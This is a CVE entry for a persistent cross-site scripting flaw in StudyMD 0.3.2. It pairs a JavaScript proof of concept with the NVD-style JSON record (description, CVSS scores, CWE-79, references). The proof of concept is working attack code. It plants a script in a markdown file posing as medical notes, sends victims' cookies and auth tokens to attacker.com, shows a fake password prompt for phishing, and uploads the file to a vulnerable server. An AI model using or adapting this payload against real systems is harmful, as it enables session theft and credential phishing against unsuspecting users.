CVE-2021-47842

// CVE-2021-47842 PoC - StudyMD Persistent XSS // Create a malicious markdown file with embedded JavaScript payload const maliciousMarkdown = ` # Medical Notes - Confidential This document contains important study materials. <script> // Steal session cookies and send to attacker server const stolenData = { cookies: document.cookie, localStorage: localStorage.getItem('authToken'), userAgent: navigator.userAgent, timestamp: new Date().toISOString() }; // Send stolen data to attacker-controlled endpoint fetch('https://attacker.com/collect?data=' + btoa(JSON.stringify(stolenData))); // Alternative payload: Session Hijacking document.body.innerHTML = '<h1>Session Expired</h1><form action="https://attacker.com/phish">Enter Password: <input type="password" name="pwd"><button>Submit</button></form>'; </script> ## Key Concepts - Pharmacology interactions - Pathophysiology review - Clinical case studies `; // Upload the malicious file via StudyMD upload endpoint async function exploit() { const formData = new FormData(); const blob = new Blob([maliciousMarkdown], { type: 'text/markdown' }); formData.append('file', blob, 'medical_notes.md'); // Upload to vulnerable endpoint await fetch('https://vulnerable-server/api/upload', { method: 'POST', body: formData, credentials: 'include' }); console.log('Malicious markdown uploaded. Users viewing this file will be compromised.'); } exploit(); // Note: This PoC demonstrates the vulnerability for authorized security testing only.

{"cve": {"id": "CVE-2021-47842", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:10.020", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "StudyMD 0.3.2 contains a persistent cross-site scripting vulnerability that allows attackers to inject malicious scripts into markdown files. Attackers can upload crafted markdown files with embedded JavaScript payloads that execute when the file is opened, potentially enabling remote code execution."}, {"lang": "es", "value": "StudyMD 0.3.2 contiene una vulnerabilidad de cross-site scripting persistente que permite a los atacantes inyectar scripts maliciosos en archivos markdown. Los atacantes pueden subir archivos markdown manipulados con cargas útiles de JavaScript incrustadas que se ejecutan cuando se abre el archivo, lo que podría permitir la ejecución remota de código."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/jotron/StudyMD", "source": "[email protected]"}, {"url": "https://imgur.com/a/lDHKEIp", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49832", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/studymd-persistent-cross-site-scripting", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/studymd-persistent-cross-site-scripting", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}